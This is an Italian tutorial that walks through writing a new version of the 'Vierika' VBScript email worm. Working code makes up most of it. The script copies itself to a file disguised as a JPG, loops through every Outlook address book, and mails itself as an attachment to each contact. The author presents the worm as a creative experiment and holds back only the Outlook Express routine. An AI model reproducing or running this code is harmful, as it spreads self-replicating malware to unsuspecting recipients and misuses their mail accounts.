Quando ci si accinge a scrivere un software ... virus... c' da porsi se non altro l'obiettivo da raggiungere. Trovo limitativo il fine di distruggere file. Trovo invece interessante portare messaggi, creare. Facciamo un esperimento: scrivere una nuova versione di Vierika... 

 

Scrivendo un VBS la prima operazione duplicarci. Cos:

 

Set VierikaFile = createobject("scripting.filesystemobject")
VierikaFile.copyfile wscript.scriptfullname, "c:\Vierika.JPG.vbs"

In questo modo abbiamo creato una copia del file VBS nella root che stiamo eseguendo in questo momento. E' ovvio che l'esecuzione effettuata dall'utente che riceve questa mail ed apre l'allegato.

 

 

Poi creiamo in memoria un oggetto Microsoft Outlook e accediamo alla rubrica o alle diverse rubriche.

Set Client = CreateObject("Outlook.Application")
Set Address = Client.GetNameSpace("MAPI")


For ItemList = 1 To Address.AddressLists.Count '<------ Ciclo per tute le rubriche
    Set CurrentAddress = Address.AddressLists(ItemList) '<----puntiamo la rubrica corrente
        

        For entries = 1 To CurrentAddress.AddressEntries.Count '<---- Ciclo per gli indirizzi Email
            victim = CurrentAddress.AddressEntries(entries)
'<---- Victim contiene l'email
            Set Mailtosend = Client.CreateItem(0)
'<---- Crea in memoria la mail

            Mailtosend.Recipients.Add (victim) '<---- Scrive l'indirizzo Email
            Mailtosend.Subject = "The Matrix has you"
'<---- Scrive il soggetto della Email
            Mailtosend.Body ="Wake up Neo..."
'<---- Scrive il testo della Email
            Mailtosend.Attachments.Add ("c:\Vierika.JPG.vbs")
'<---- Aggiunge l'allegato alla Email
            Mailtosend.Send
'<---- Spedisce la  Email
        Next

Next

'Distrugge gli oggetti in memoria

Set Client = Nothing
Set Address = Nothing


Questa versione funziona solo se l'utente in possesso di Microsoft Outlook e non Outlook Express. Per replicarsi tramite Outlook Express il sistema leggermente diverso...

...al momento... preferisco non pubblicare tale routine... l'uso improprio potrebbe fare comodo a chi crea virus per danneggiare sistemi...